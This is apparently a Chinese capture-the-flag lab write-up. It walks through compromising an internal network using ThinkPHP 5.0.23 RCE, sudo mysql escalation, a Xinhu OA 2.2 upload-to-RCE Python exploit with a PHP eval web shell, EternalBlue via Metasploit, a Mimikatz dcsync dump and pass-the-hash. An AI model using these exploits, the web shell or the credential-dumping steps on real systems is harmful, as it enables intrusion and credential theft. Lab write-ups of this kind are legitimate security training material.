flag1:

fscan扫一下,发现有thinkphp的洞

image-20250711182227565

thinkphp-rce

thinkphpGUI嗦一下,发现是ThinkPHP 5.0.23 RCE

image-20250711182417978

蚁剑连接,找到flag的位置,但是权限不够

image-20250711182635587

检验一下,发现是www-data权限,然后sudo -l看一下可以用sudo执行的命令

1
2
User www-data may run the following commands on ubuntu-web01:
    (root) NOPASSWD: /usr/bin/mysql

image-20250711183046245

sudo提权-mysql

可以用数据库执行命令sudo mysql -e '\!'拿到第一段flag

image-20250711183401672

ifconfig发现内网网段为172.22.1.*,然后上传fscan去扫内网(记得要给fscan可执行权限)

flag2:

先来整理一下

1
2
3
4
MS17-010 172.22.1.21
http://172.22.1.18?m=login 信呼协同办公系统
http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1	已穿
172.22.1.2      [+] DC:DC01.xiaorang.lab

搭建内网代理:

为了访问到内网,我们要先搭建内网代理,此处用stowaway搭建,并且socket监听一个端口

image-20250711190105432

然后用proxifier连接代理,注意修改rule里的target_hosts

image-20250711190313708

连接完成后,即可访问

image-20250711190534385

这里是弱口令admin123

信呼OA2.2-RCE

查询漏洞发现信呼2.2版本是存在文件上传漏洞的,首页通知中也有说明版本为2.2

image-20250711190849789

找了篇文章来打:[代码审计]信呼协同办公系统2.2存在文件上传配合云处理函数组合拳RCE_信呼协同办公系统弱口令-CSDN博客

1.php:记得改为POST

1
<?php eval($_POST["1"]);?>

exp.py:修改URL和adminuser及adminpass

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import requests
 
 
session = requests.session()
 
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
 
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}
 
 
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
 
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
 
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
 
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

由于此时本机已经用proxifier连接了代理,所以本地直接运行也是可以的

我这里在kali里运行,先配置proxychains,写入socket5 vps地址

1
proxychains python exp.py

image-20250711192716390

此时访问发现存在:

image-20250711192803689

直接蚁剑连接即可,找到第二段flag

image-20250711193024504

flag3:

再来回顾一下:

1
2
3
4
MS17-010 172.22.1.21
http://172.22.1.18?m=login 信呼协同办公系统 			       已穿
http://172.22.1.15poc-yaml-thinkphp5023-method-rce poc1		 已穿
172.22.1.2      [+] DC:DC01.xiaorang.lab

那么接下来对172.22.1.21下手,MS17-010即永恒之蓝,可以直接用msf一把梭(我用的kali的)

1
2
3
4
5
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
run

image-20250711195349110

此时就是一个系统权限

image-20250711195558291

然后就要尝试抓取用户的哈希进行PTH

dcsync

先用load kiwi加载Mimikatz

然后在获取权限的域成员主机上执行kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

image-20250711200301608

得到Administrator的哈希:10cf89a850fb1cdbe6bb432b859164c8

PTH

进行哈希传递

发现传递成功,接下来即可执行命令拿flag了

image-20250711200617071